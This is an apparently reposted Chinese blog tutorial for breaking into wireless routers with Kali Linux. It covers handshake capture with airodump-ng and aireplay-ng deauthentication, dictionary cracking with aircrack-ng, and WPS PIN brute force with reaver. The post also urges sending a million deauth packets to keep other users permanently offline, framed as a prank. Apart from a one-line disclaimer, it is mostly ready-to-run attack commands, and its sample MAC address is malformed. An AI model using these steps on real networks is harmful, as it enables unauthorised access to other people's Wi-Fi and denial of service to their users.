Kali 爆破和非爆破無線路由賬號和密碼+讓別人無線掉線


這篇日志基於別人一篇BT5的破解,Kali同樣適用.附加Pin碼破解

1.ifconfig看看自己的無線網卡的名稱,一般是wlan0或者eth0,后文中根據實際情況執行命令。

2.airodump-ng wlan0 掃描當前所有路由器

3.開啟無線監控

airmon-ng start wlan0 6

注:wlan0為你的無線設備名稱  6為你要開啟的信道(但是這里的6其實並沒有那么重要的說)

這一步你可能會看到提示有XXXX XXXX進程影響,沒關系,kill XXX XXX    XXX為給出的進程號,然后重新執行上句直到不報錯

4.因為我們已經選擇好了目標,我們就直奔目標AP,開始用BT5對其進行監控

airodump-ng -w nenew -c 4 --bssid AP‘s MAC mon0

這時候你應該可以看到如下圖示:

1

5.根據上圖,我們可以找到四個Client客戶端的MAC地址,從里面隨便選個(最好選擇活躍點兒的)。打開一個新的終端,上一個終端不要關閉,后面還需要用到。在新終端中輸入:
aireplay-ng -0 10 -a AP’s MAC -c CP’s MAC mon0

 

在這里插一句話,如果你破解不了當前路由器或者看這個ssid很不爽,這里將上述設置的10改成很大的數字,別人無限掉線~ 嘿嘿是不是很壞呢。

eg:aireplay-ng -0 1000000 -a AP’s MAC -c CP’s MAC mon0

 

執行一次看第一個終端中是否出現了下圖所示的標志WAP Handshake 。如果出現了,那么恭喜,你離成功已經不遠了。如果沒有出現就繼續重復5的命令就ok了,直到出現握手。

6.對BT5握手抓到的包進行破解工作

aircrack-ng -w password.txt -b AP’s MAC nenew.cap

其中的password.txt為我們需要預置的字典文件,字典文件網上很多,搜搜就有了。奶牛也會放出自己的一些字典文件提供下載,繼續關注咯。

這里推薦一個字典生成工具,木頭超級字典生成工具。

最后上成果圖

本文只做技術討論,不要用於非法用途,否則后果自負。

 

Way2 

基於前面拿到的路由器Mac地址

1.airodump-ng wlan0 掃描當前所有路由器

2.wash -i wlan0 -c 顯示當前路由器

3.wash -i wlan0 -c 11 -C -s 11信道11,查看WPS是否關閉 (No)即可以,只有開啟的才使用

4.reaver -i wlan0 -b (上面的地址)T'sMac --fail-wait=360  (出現選項輸n)

Eg:reaver -i wlan0 -b 00:11:22:33:44:55:66 --fail-wait=360

剩下的就是默默的等待,pin碼對了既可以破解.感覺沒有暴力字典好啊~

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM